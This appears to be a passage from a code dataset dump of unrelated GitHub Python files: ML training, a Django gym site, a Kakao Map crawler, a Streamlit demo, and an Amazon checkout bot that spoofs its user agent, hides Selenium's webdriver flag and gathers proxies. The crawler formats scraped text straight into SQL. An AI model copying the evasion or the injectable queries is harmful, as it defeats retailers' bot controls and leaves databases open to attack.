vis_limit_num, 'Fog_30', 0.3)\n\n print(train_x.shape, train_y.shape, test_x.shape, test_y.shape)\n\n X_train_over, y_train_over = SMOTE(random_state=0).fit_resample(train_x,\n train_y) # smote.fit_sample(train_x,train_y)\n print('Before applying unbalanced data algorithms, Learning Feature/Label Dataset: ', train_x.shape, train_y.shape)\n print('After applying unbalanced data algorithms, Learning Feature/Label Dataset: ', X_train_over.shape, y_train_over.shape)\n print('After applying unbalanced data algorithms, Label Value Distribution: \\n', pd.Series(y_train_over).value_counts())\n\n torch_train_x, torch_train_y, torch_test_x, torch_test_y = convert_torch_type(X_train_over, y_train_over,\n test_x, test_y)\n torch_train_x = torch_train_x.reshape([torch_train_x.shape[0], torch_train_x.shape[1]])\n torch_test_x = torch_test_x.reshape([torch_test_x.shape[0], torch_test_x.shape[1]])\n torch_train_y = torch_train_y.reshape([torch_train_y.shape[0], 1])\n torch_test_y = torch_test_y.reshape([torch_test_y.shape[0], 1])\n print(torch_train_x.shape, torch_train_y.shape, torch_test_x.shape, torch_test_y.shape)\n\n test_nonoccurrence_list = []\n test_occurrence_list = []\n test_occurrence_precision_list = []\n\n train_nonoccurrence_list = []\n train_occurrence_list = []\n train_occurrence_precision_list = []\n\n train_rmse_list = []\n test_rmse_list = []\n\n train_f1_score_list = []\n test_f1_score_list = []\n\n for i in range(len(all_parameters_list)):\n print(\"Progress : {:.2f}%\".format(((i + 1) / len(all_parameters_list)) * 100))\n num_unit_1, num_unit_2, num_unit_3, lr, batch_size, n_epochs, drop_out = all_parameters_list[i][0], \\\n all_parameters_list[i][1], \\\n all_parameters_list[i][2], \\\n all_parameters_list[i][3], \\\n all_parameters_list[i][4], \\\n all_parameters_list[i][5], \\\n all_parameters_list[i][6],\n\n all_parameters_list = change_batch_size(vis_limit_num, all_parameters_list, i)\n\n print(torch_train_x.shape, torch_train_y.shape, torch_test_x.shape, torch_test_y.shape)\n train = torch.utils.data.TensorDataset(torch_train_x, torch_train_y)\n test = torch.utils.data.TensorDataset(torch_test_x, torch_test_y)\n train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, shuffle=True)\n test_loader = torch.utils.data.DataLoader(test, batch_size=batch_size, shuffle=False)\n seed = 1\n lr = lr\n momentum = 0.5\n no_cuda = False\n batch_size = batch_size\n torch.manual_seed(seed)\n use_cuda = not no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n network = Deep_Neural_Network_Target_Existence(num_unit_1=num_unit_1, num_unit_2=num_unit_2,\n num_unit_3=num_unit_3, input_num=torch_train_x.shape[1],\n drop_out=drop_out).to(device)\n optimizer = optim.Adam(network.parameters(), lr=lr)\n criterion = nn.BCEWithLogitsLoss(reduction='mean')\n\n for epoch in range(n_epochs):\n epoch_loss = 0\n epoch_acc = 0\n # network.train()\n for batch_index, (x_batch, y_batch) in enumerate(train_loader):\n x_batch, y_batch = x_batch.to(device), y_batch.to(device)\n optimizer.zero_grad()\n # print(x_batch.shape)\n y_pred = network(x_batch)\n loss = criterion(y_pred, y_batch)\n # print(y_pred.shape)\n acc = binary_acc(y_pred, y_batch)\n\n loss.backward()\n optimizer.step()\n\n epoch_loss += loss.item()\n epoch_acc += acc.item()\n\n # Test Loss\n test_epoch_loss = 0\n test_epoch_acc = 0\n for batch_index, (x_batch, y_batch) in enumerate(test_loader):\n x_batch, y_batch = x_batch.to(device), y_batch.to(device)\n y_pred = network(x_batch)\n test_loss = criterion(y_pred, y_batch)\n test_acc = binary_acc(y_pred, y_batch)\n test_epoch_loss += test_loss.item()\n test_epoch_acc += test_acc.item()\n\n # append test,train loss to list\n if (epoch % 100 == 0) | (epoch == n_epochs-1):\n test_predict = torch.round(torch.sigmoid(\n network(torch.tensor(torch_test_x, dtype=torch.float).cuda()).clone().detach())).cpu().detach().numpy().squeeze()\n\n test_occurrence_accuracy, test_occurrence_precision, test_f1_score, test_rmse = return_precision_recall_f1(test_predict, torch_test_y)\n\n test_nonoccurrence_accuracy, test_nonoccurrence_precision, test_nonf1_score, test_rmse = return_precision_recall_f1(test_predict, torch_test_y, 0)\n\n print(\"Train Epoch : {} Train Loss: {:.6f} Train Acc: {:.3f} Test Loss: {:.6f} Test Acc: {:.3f}\".\n format(epoch, epoch_loss, epoch_acc / len(train_loader), test_epoch_loss,\n test_epoch_acc / len(test_loader)))\n\n print(\"(TEST) Occurrence Accuracy : {:.3f} / Occurrence Precision : {:.3f} / F1 Score : {:.3f} \".\n format(test_occurrence_accuracy, test_occurrence_precision, test_f1_score))\n\n print(\"(TEST) Nonoccurrence Accuracy : {:.3f} / Nonoccurrence Precision : {:.3f} / Nonoccurrence F1 Score : {:.3f}\\n \".\n format(test_nonoccurrence_accuracy, test_nonoccurrence_precision, test_nonf1_score))\n\n\n # test_predict\n test_predict = torch.round(torch.sigmoid(\n network(torch.tensor(torch_test_x, dtype=torch.float).cuda()).clone().detach())).cpu().detach().numpy().squeeze()\n\n test_occurrence_accuracy, test_occurrence_precision, test_f1_score, test_rmse = return_precision_recall_f1(\n test_predict, torch_test_y)\n test_nonoccurrence_accuracy, test_nonoccurrence_precision, test_nonf1_score, test_rmse = return_precision_recall_f1(\n test_predict, torch_test_y, 0)\n\n # append test predict to list\n test_nonoccurrence_list.append(test_nonoccurrence_accuracy)\n test_occurrence_list.append(test_occurrence_accuracy)\n test_occurrence_precision_list.append(test_occurrence_precision)\n test_f1_score_list.append(test_f1_score)\n test_rmse_list.append(test_rmse)\n\n # train predict\n train_predict = torch.round(torch.sigmoid(network(\n torch.tensor(torch.tensor(np.array(train_x), dtype=torch.float32), dtype=torch.float).cuda()).clone().detach())).cpu().detach().numpy().squeeze()\n train_occurrence_accuracy, train_occurrence_precision, train_f1_score, train_rmse = return_precision_recall_f1(\n train_predict, train_y)\n train_nonoccurrence_accuracy, train_nonoccurrence_precision, train_nonf1_score, train_rmse = return_precision_recall_f1(\n train_predict, train_y, 0)\n\n # append train predict to list\n train_nonoccurrence_list.append(train_nonoccurrence_accuracy)\n train_occurrence_list.append(train_occurrence_accuracy)\n train_occurrence_precision_list.append(train_occurrence_precision)\n train_f1_score_list.append(train_f1_score)\n train_rmse_list.append(train_rmse)\n\n # save torch model\n torch.save(network.state_dict(), save_path + str(obs_point) + \"\\\\\" + str(\n vis_limit_num) + '\\\\Train_{}_under_{}_{}_{}_{}_{}_{}_{}_{}.pth'.format(\n obs_point, vis_limit_num, num_unit_1, num_unit_2, num_unit_3, lr, batch_size, n_epochs, drop_out))\n\n # save model result to csv file\n result_df = pd.DataFrame({'Train Recall(non)': train_nonoccurrence_list,\n 'Train Recall': train_occurrence_list,\n 'Train precision': train_occurrence_precision_list,\n 'Train F1 score': train_f1_score_list,\n 'Train RMSE': train_rmse_list,\n 'Test Recall(non)': test_nonoccurrence_list,\n 'Test Recall': test_occurrence_list,\n 'Test precision': test_occurrence_precision_list,\n 'Test F1 score': test_f1_score_list,\n 'Test RMSE': test_rmse_list,})\n\n # Save Model parameters Result\n columns = ['layer_1', 'layer_2', 'layer_3', 'lr', 'bs', 'epochs', 'drop_out']\n nn_structure = pd.DataFrame(all_parameters_list, columns=columns)\n result_df = pd.concat([result_df, nn_structure], axis=1)\n sort_result_df = result_df.sort_values('Test RMSE', ascending=True)\n file_info = \"{}_{}_all_model_result\".format(str(obs_point), str(vis_limit_num)) + \".csv\"\n sort_result_df.to_csv(save_path + str(obs_point) + \"\\\\\" + str(vis_limit_num) + '\\\\' + file_info)\n","repo_name":"hahw94/Fog_DNN","sub_path":"run/occrun.py","file_name":"occrun.py","file_ext":"py","file_size_in_byte":13290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26640174219","text":"import media\nimport website_generator\n\n__author__ = 'ali786'\n\n# Creating instances of Movie class which will show up on the web page\nvirgin_snow = media.Movie(\"Virgin Snow\",\n \"Returning to Japan, \"\n \"a man tries to find \"\n \"the beautiful woman who captured his heart.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/5/50/Virgin_Snow_%28film%29.jpg/220px-Virgin_Snow_%28film%29.jpg\", # noqa\n \"https://www.youtube.com/watch?v=P2mRL3ZBfp0\", # noqa\n \"Romance\")\nparadise_kiss = media.Movie(\"Paradise Kiss\",\n \"A heartwarming love story.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/0/08/Paradise_Kiss_Movie_Poster.jpg/220px-Paradise_Kiss_Movie_Poster.jpg\", # noqa\n \"https://www.youtube.com/watch?v=zkH_4nDmOTM\", # noqa\n \"Romance\")\nlaundry = media.Movie(\"Laundry\",\n \"Sensitive, romantic and \"\n \"heart-touching tale of a pure soul.\",\n \"http://asianwiki.com/images/a/aa/Laundryposter.jpg\", # noqa\n \"https://www.youtube.com/watch?v=1At_7Y3rNIE\", # noqa\n \"Slice of Life\")\na_millionaires_first_love = media.Movie(\"A Millionaire's First Love\",\n \"A story showcasing that \"\n \"Nothing is more important\"\n \"than the true love of one's heart.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/d/da/A_Millionaire%27s_First_Love.jpg/220px-A_Millionaire%27s_First_Love.jpg\", # noqa\n \"https://www.youtube.com/watch?v=k-JQ797aBwc\", # noqa\n \"Romance\")\na_moment_to_remember = media.Movie(\"A Moment to Remember\",\n \"A tale of discovery \"\n \"in a relationship and \"\n \"the burdens of loss \"\n \"caused by Alzheimer's disease.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/7/76/A_Moment_to_Remember_Poster.jpg/220px-A_Moment_to_Remember_Poster.jpg\", # noqa\n \"https://www.youtube.com/watch?v=LFLSwFEiANg\", # noqa\n \"Romance\")\nthe_wings_of_the_bird = media.Movie(\"The Wings of the Kirin\",\n \"A thriller detective story \"\n \"with subtle philosophical moments\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/2/23/The_Wings_of_the_Kirin_film_poster.jpg/220px-The_Wings_of_the_Kirin_film_poster.jpg\", # noqa\n \"https://www.youtube.com/watch?v=IMvnC2GjbGs\", # noqa\n \"Thriller\")\n\n# Creating a list of the movie objects\nfavourite_movies = [\n virgin_snow,\n paradise_kiss,\n laundry,\n a_millionaires_first_love,\n a_moment_to_remember,\n the_wings_of_the_bird]\n\n# Calling the generator for the web page\nwebsite_generator.open_movies_page(favourite_movies)\n","repo_name":"ongakugene/movie-trailers","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4909450335","text":"dictionary = {\"cat\": \"gato\", \"perro\": \"chien\", \"caballo\": \"cheval\"}\nwords = ['gato', 'leon', 'caballo']\n\n\n\nfor word in words:\n if word in dictionary:\n print(word, \"->\", dictionary[word])\n else:\n print(word, \"No esta en el diccionario\")\n","repo_name":"David-alzate/Programacion","sub_path":"python/Diccionarios/ejemplo1.py","file_name":"ejemplo1.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20225982202","text":"'''\r\nAlex\r\nBot Program for Amazon\r\n'''\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.common.exceptions import TimeoutException\r\nimport time\r\nimport random\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\r\noptions.add_experimental_option('useAutomationExtension', False) \r\n#options.add_argument('--headless')\r\noptions.add_argument(\"user-data-dir=C:/Users/Alex/AppData/Local/Google/Chrome/User Data\")\r\noptions.add_argument(\"--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\")\r\noptions.add_argument(\"--disable-blink-features=AutomationControlled\")\r\ndriver = webdriver.Chrome('C:/chromedriver.exe', options=options)\r\ndriver.execute_script(\"Object.defineProperty(navigator, 'webdriver', {get: () => undefined})\")\r\n\r\ndriver.get(\"https://www.amazon.com/dp/B08HHDP9DW/?coliid=I3FSKH16WR7GUO&colid=3PM8NMET43SN6&psc=0&ref_=lv_ov_lig_dp_it\")\r\nrando = (random.uniform(2.7, 5.2))\r\nrefreshee = (random.uniform(25.6, 35.7))\r\nrandScroll = random.randint(240,600)\r\ntime.sleep(rando)\r\n\r\na = driver.find_element_by_xpath\r\nb = driver.find_elements_by_xpath\r\n\r\n\r\nwhile len(b('//*[@id=\"add-to-cart-button\"]')) == 0:\r\n print('Not found')\r\n time.sleep(refreshee)\r\n driver.refresh()\r\n driver.execute_script(\"window.scrollTo(0,\"+str(randScroll)+\");\") \r\n\r\na('//*[@id=\"add-to-cart-button\"]').click()\r\n\r\n#This is option for warranty... if it exists click no\r\ntime.sleep(rando)\r\nif len(b('//*[@id=\"siNoCoverage-announce\"]')) > 0:\r\n a('//*[@id=\"siNoCoverage-announce\"]').click()\r\n\r\ntime.sleep(rando)\r\n\r\n#go to the cart \r\na('//*[@id=\"nav-cart-count-container\"]').click()\r\ntime.sleep(rando)\r\na('//*[@id=\"sc-buy-box-ptc-button\"]/span/input').click()\r\ntime.sleep(rando)\r\n\r\n#if prime sign up is asked then click no\r\nif len(b('//*[@id=\"signup_cancel\"]')) > 0:\r\n a('//*[@id=\"signup_cancel\"]').click()\r\n \r\ntime.sleep(rando)\r\n\r\n#apply discover cashback to purchase\r\na('//*[@id=\"inline-points-button\"]/span/span[1]').click()\r\ntime.sleep(rando)\r\n\r\n#free shipping option\r\na('//*[@id=\"spc-orders\"]/div[1]/div/div[3]/div/div/div[2]/div[2]/div[1]/fieldset/div[2]/input').click()\r\ntime.sleep(rando)\r\n\r\n\r\n'''\r\n#place order\r\na('//*[@id=\"placeYourOrder\"]/span/input')\r\n'''\r\n\r\n#Sign in to amazon\r\nurl = (\"https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcss%2Fhomepage.html%3Fref_%3Dnav_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&\")\r\ndriver.get(url)\r\n\r\ntime.sleep(1.1)\r\ndriver.find_element_by_xpath('//*[@id=\"ap_email\"]').send_keys('email@gmail.com')\r\ntime.sleep(1.9)\r\ndriver.find_element_by_xpath('//*[@id=\"continue\"]').click()\r\n\r\ndriver.find_element_by_xpath('//*[@id=\"ap_password\"]').send_keys('password')\r\ntime.sleep(1.6)\r\ndriver.find_element_by_xpath('//*[@id=\"signInSubmit\"]').click()\r\ntime.sleep(.75)\r\ndriver.find_element_by_xpath('//*[@id=\"authportal-main-section\"]/div[2]/div/div/div/form/div/div[2]/div/div/label/div/label/input').click()\r\n\r\ndriver.get(\"https://sslproxies.org/\")\r\ndriver.find_element_by_xpath('//*[@id=\"proxylisttable_filter\"]/label/input').send_keys('United States elite')\r\ntime.sleep(2)\r\n\r\n#ips = driver.find_element_by_xpath('//*[@id=\"proxylisttable\"]/tbody/tr[1]/td[1]').text\r\n#ports = driver.find_element_by_xpath('//*[@id=\"proxylisttable\"]/tbody/tr[1]/td[2]').text\r\nips = [my_elem.get_attribute(\"innerHTML\") for my_elem in WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, \"//table[@class='table table-striped table-bordered dataTable']//tbody//tr[@role='row']/td[position() = 1]\")))]\r\nports = [my_elem.get_attribute(\"innerHTML\") for my_elem in WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, \"//table[@class='table table-striped table-bordered dataTable']//tbody//tr[@role='row']/td[position() = 2]\")))]\r\ndriver.quit()\r\n\r\n\r\n#PROXY SETUP NOT FINISHED\r\n'''\r\nproxies = []\r\nfor i in range(0, len(ips)):\r\n proxies.append(ips[i]+':'+ports[i])\r\nprint(proxies)\r\n\r\nfor i in range(0, len(proxies)):\r\n try:\r\n options.add_argument('--proxy-server={}'.format(proxies[i]))\r\n driver = webdriver.Chrome(options=options, executable_path=r'C:/Users/molte/Downloads/chromedriver_win32/chromedriver.exe')\r\n driver.get(\"https://amazon.com/\")\r\n print('YAH')\r\n except Exception:\r\n driver.quit()\r\n\r\n'''\r\n","repo_name":"MoltenMarlin/OnlineBot","sub_path":"OnlineBot.py","file_name":"OnlineBot.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19591271317","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView, FormView, ListView, CreateView\nfrom django.views import View\nimport stripe\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom .models import MembershipPlan, MembershipPlanPrice\nfrom users.models import Account, Membership\nimport datetime\nfrom datetime import datetime as dt\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib import messages\nstripe.api_key = settings.STRIPE_SECRET_KEY\nclass Index(TemplateView):\n template_name = 'gym_app/index.html'\n\n\n\nclass Checkout(View):\n def post(self, request, *args, **kwargs):\n price = MembershipPlanPrice.objects.get(id=self.kwargs[\"pk\"])\n print(price.membership_plan)\n DOMAIN = 'http://127.0.0.1:8000'\n checkout_session = stripe.checkout.Session.create(\n payment_method_types = ['card'],\n line_items = [\n {\n 'price' : price.stripe_price,\n 'quantity': 1,\n },\n ],\n mode = 'payment',\n success_url = DOMAIN + '/success/',\n cancel_url = DOMAIN,\n )\n # Check if user has active plan\n acc_user = Account.objects.get(user = self.request.user)\n query_date = Membership.objects.filter(account = acc_user).latest('date')\n iterable_query_date = Membership.objects.filter(account = acc_user)\n \n if query_date.date == datetime.date.today():\n return redirect('gym:index')\n if dt.today() < dt.today()+ relativedelta(months=1):\n return redirect('gym:index')\n else:\n for date in iterable_query_date:\n if date.date == datetime.date.today():\n return redirect('gym:index')\n else:\n user_progress = Account.objects.get(user = self.request.user)\n user_progress.user_progress += 1\n Account.objects.filter(user = self.request.user).update(user_progress = user_progress.user_progress)\n Membership.objects.create(account = acc_user, date = datetime.date.today(), membership_plan = price.membership_plan)\n\n return redirect(checkout_session.url)\n\nclass PlanView(TemplateView):\n template_name = \"gym_app/plan.html\"\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n plan = MembershipPlan.objects.get(name = \"Monthly Plan\")\n price = MembershipPlanPrice.objects.filter(membership_plan = plan)\n\n context['plan'] = plan\n context['price_fields'] = price\n\n return context\n\nclass PlansView(ListView):\n template_name = 'gym_app/plans.html'\n model = MembershipPlan\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n # gets all plans\n name_of_plans = MembershipPlan.objects.all()\n\n # Displays warning message to users that have active plan\n acc_user = Account.objects.get(user = self.request.user)\n query_date = Membership.objects.filter(account = acc_user).latest('date')\n\n if query_date.date == datetime.date.today():\n messages.warning(self.request, 'You bought gym plan today. If you buy another one it will not count in your progress track!')\n elif dt.today() < dt.today()+ relativedelta(months=1):\n messages.warning(self.request, \"Your gym plan didn't expire yet. If you buy another one it will not count in your progress track!\")\n else:\n pass\n context['name_of_plans'] = name_of_plans\n return context\n\nclass Success(TemplateView):\n template_name = 'gym_app/success.html'\n\n \nclass CancelView(TemplateView):\n template_name = 'gym_app/cancel.html'\n\n\ndef send_email(request):\n if request.method == 'POST':\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n email = request.POST['email']\n problem_description = request.POST['problem_description']\n send_mail(\n 'User problem',\n 'First name: '+first_name+'\\nLast name: '+last_name +'\\n'\n 'Problem description: '+problem_description,\n email,\n ['stefan.programming22@gmail.com'],\n )\n return render(request, 'gym_app/help.html')\n\n \n return render(request, 'gym_app/help.html')\n\n\nclass AboutView(TemplateView):\n template_name = 'gym_app/about.html'\n\n\nclass AccountView(TemplateView):\n template_name = 'gym_app/account.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n account_user = Account.objects.get(user = self.request.user)\n membership = Membership.objects.filter(account = account_user)\n stars = []\n for i in membership:\n print(i.account.user)\n print(i.date)\n print(i.plan)\n progress = i.date\n stars.append(progress)\n print(account_user)\n context['membership'] = membership\n context['account'] = account_user\n context['stars'] = stars\n \n return context\n\n","repo_name":"vstefan22/Gym-site","sub_path":"gym_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39297659868","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 19 01:07:55 2019\r\n\r\n@author: Pyardeep Birdi\r\n\"\"\"\r\n\r\nfrom project.models import db\r\ndb.create_all()\r\n\r\n\r\ns = 'hello$world$this$is$best'\r\ns = s.replace('$',',')\r\nprint(s)\r\n","repo_name":"bpyardeep/Python-Flask","sub_path":"project/creating_db.py","file_name":"creating_db.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15741679634","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nimport pymysql\n\nconn = pymysql.connect(host='127.0.0.1', user='root', password='1234', db=\"lunch_db\")\ncur = conn.cursor()\n\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument(\"headless\")\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options)\ndriver.get(\"https://map.kakao.com/?q=%EC%9D%B4%EB%8F%84%EA%B3%B0%ED%83%95%20%EB%B3%B8%EC%A0%90%20%EA%B7%BC%EC%B2%98%20%EC%8B%9D%EB%8B%B9\")\n\ntime.sleep(3)\n\ndef get_menus (title):\n menus = {}\n try:\n more_button = driver.find_element(By.CSS_SELECTOR, '#mArticle > div.cont_menu > a')\n more_button.send_keys(Keys.ENTER)\n except:\n print('hi')\n\n names = driver.find_elements(By.XPATH, '//*[@id=\"mArticle\"]/div/ul/li/div/span')\n prices = driver.find_elements(By.XPATH, '//*[@id=\"mArticle\"]/div/ul/li/div/em')\n prices2 = driver.find_elements(By.CSS_SELECTOR, 'em.price_menu')\n\n menus['메뉴'] = []\n menus['가격'] = []\n\n for i in range(len(names)):\n menus['메뉴'].append(names[i].text)\n\n if prices[i].text != '':\n menus['가격'].append(prices[i].text)\n cur.execute('INSERT INTO menu (store, name, price) values ({},{},{})'.format('\"' + title + '\"', '\"' + names[i].text + '\"', '\"' + prices[i].text + '\"'))\n else:\n menus['가격'].append(prices2[i].text)\n cur.execute('insert into menu(store, name, price) values({},{},{})'.format('\"' + title + '\"', '\"' + names[i].text + '\"', '\"' + prices2[i].text + '\"'))\n conn.commit()\n return menus\n\n\n\n\ndef crawl (menus, title_arr, page, goal):\n if page == 1:\n more_place = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.place\\.more\")\n more_place.send_keys(Keys.ENTER)\n print('succeed', 'page = ', page)\n time.sleep(3)\n\n if page > 1:\n next_button = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.page\\.next\")\n next_button.send_keys(Keys.ENTER)\n print('succeed', 'page = ', page)\n time.sleep(3)\n\n if page > goal:\n print (menus, title_arr)\n return menus, title_arr\n\n\n titles = driver.find_elements(By.CSS_SELECTOR, \"a.link_name\")\n details = driver.find_elements(By.CSS_SELECTOR, \"div.contact.clickArea > a.moreview\")\n\n for i in range(len(titles)):\n print(titles[i].text)\n cur.execute('insert into store(name) values({})'.format('\"' + titles[i].text + '\"'))\n title = titles[i].text\n title_arr.append(title)\n print(title)\n details[i].send_keys(Keys.ENTER)\n time.sleep(3)\n driver.switch_to.window(driver.window_handles[-1])\n try:\n menus[title] = get_menus(title)\n except:\n print('이런')\n\n# menus[title] = get_menus(title)\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n print('hi')\n conn.commit()\n page += 1\n\n crawl(menus, title_arr, page, goal)\n\n\n\n\n# more_place = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.place\\.more\")\n#\n# more_place.send_keys(Keys.ENTER)\n# print('succeed')\n#\n# time.sleep(1)\n#\n# next_button = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.page\\.next\")\n# next_button.send_keys(Keys.ENTER)\n# print('succeed')\n#\n# time.sleep(1)\n#\n# next_button.send_keys(Keys.ENTER)\n# print('succeed')\n\n\n\ndef main():\n\n\n\n menus = {}\n title_arr = []\n page = 0\n\n crawl(menus, title_arr, page, 15)\n\n conn.commit()\n driver.quit()\n\n\nmain()\nconn.close()\n","repo_name":"PPS-FE-SIDE/lunch","sub_path":"server/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32939632322","text":"from __future__ import annotations\n\nimport argparse\nimport enum\nimport sys\nfrom dataclasses import dataclass\nfrom typing import TextIO\n\nfrom more_itertools import grouper\n\nPacket = list[\"Packet\"] | int\n\n\nclass Comparison(enum.Enum):\n CORRECT = 1\n INCORRECT = 2\n UNDEFINED = 3\n\n\ndef compare(left: Packet, right: Packet) -> Comparison:\n # print(f\" compare {left} vs {right}\")\n if isinstance(left, int) and isinstance(right, int):\n if left == right:\n return Comparison.UNDEFINED\n elif left < right:\n return Comparison.CORRECT\n else:\n return Comparison.INCORRECT\n\n left = left if isinstance(left, list) else [left]\n right = right if isinstance(right, list) else [right]\n for le, ri in zip(left, right):\n result = compare(le, ri)\n if result != Comparison.UNDEFINED:\n return result\n if len(right) == len(left):\n return Comparison.UNDEFINED\n if len(right) < len(left):\n return Comparison.INCORRECT\n return Comparison.CORRECT\n\n\ndef bubble_sort(packets: list[Packet]) -> None:\n \"\"\"\n Damn I need to memorize this.\n \"\"\"\n n = len(packets)\n\n # Traverse through all array elements\n for i in range(n):\n\n # Last i elements are already in place\n for j in range(0, n - i - 1):\n\n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n if compare(packets[j], packets[j + 1]) == Comparison.INCORRECT:\n packets[j], packets[j + 1] = packets[j + 1], packets[j]\n\n\ndef main(args: Arguments) -> None:\n indexes_sum = 0\n\n all_packets = list[Packet]()\n\n for i, (first_line, second_line, _) in enumerate(\n grouper(args.infile, 3, incomplete=\"fill\", fillvalue=\"\")\n ):\n left = eval(first_line)\n right = eval(second_line)\n result = compare(left, right)\n # print(\n # dedent(\n # f\"\"\"\n # == Pair {i + 1} ==\n # Compare {first_line.strip()} vs {second_line.strip()}\n # Right order? {result.name}\n # \"\"\"\n # )\n # )\n if result == Comparison.CORRECT:\n indexes_sum += i + 1\n all_packets.append(left)\n all_packets.append(right)\n print(indexes_sum)\n\n divider_2: Packet = [[2]]\n divider_6: Packet = [[6]]\n all_packets.append(divider_2)\n all_packets.append(divider_6)\n\n bubble_sort(all_packets)\n for item in all_packets:\n print(item)\n\n first_divider_index = all_packets.index(divider_2) + 1\n second_divider_index = all_packets.index(divider_6) + 1\n print(first_divider_index * second_divider_index)\n\n\n@dataclass\nclass Arguments:\n infile: TextIO = sys.stdin\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"infile\", type=argparse.FileType(\"r\"))\n\n args = Arguments()\n parser.parse_args(namespace=args)\n main(args)\n","repo_name":"rbusquet/advent-of-code","sub_path":"aoc_2022/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"12128065340","text":"import streamlit as st\n\nfrom modules.simple_ml_models import HousePriceModel\n\n\n@st.cache\ndef load_model():\n return HousePriceModel()\n\n\nif __name__ == '__main__':\n house_price_model = load_model()\n\n title = \"=> HousePriceModel <=\"\n st.markdown(f\"

\"\n f\"{title}

\", unsafe_allow_html=True)\n\n with st.form(\"my_form\"):\n\n n_floors = st.number_input('N floors', min_value=1, max_value=10, value=1)\n area = st.slider('Area', min_value=1, max_value=300, value=50)\n\n heating = st.radio('Heating', \"A B C\".split())\n\n submitted = st.form_submit_button('Submit')\n if submitted:\n result_price = house_price_model(n_floors=n_floors, area=area, heating=heating)\n output_text = f\"Price ≈ {result_price}\"\n st.markdown(f\"

{output_text}

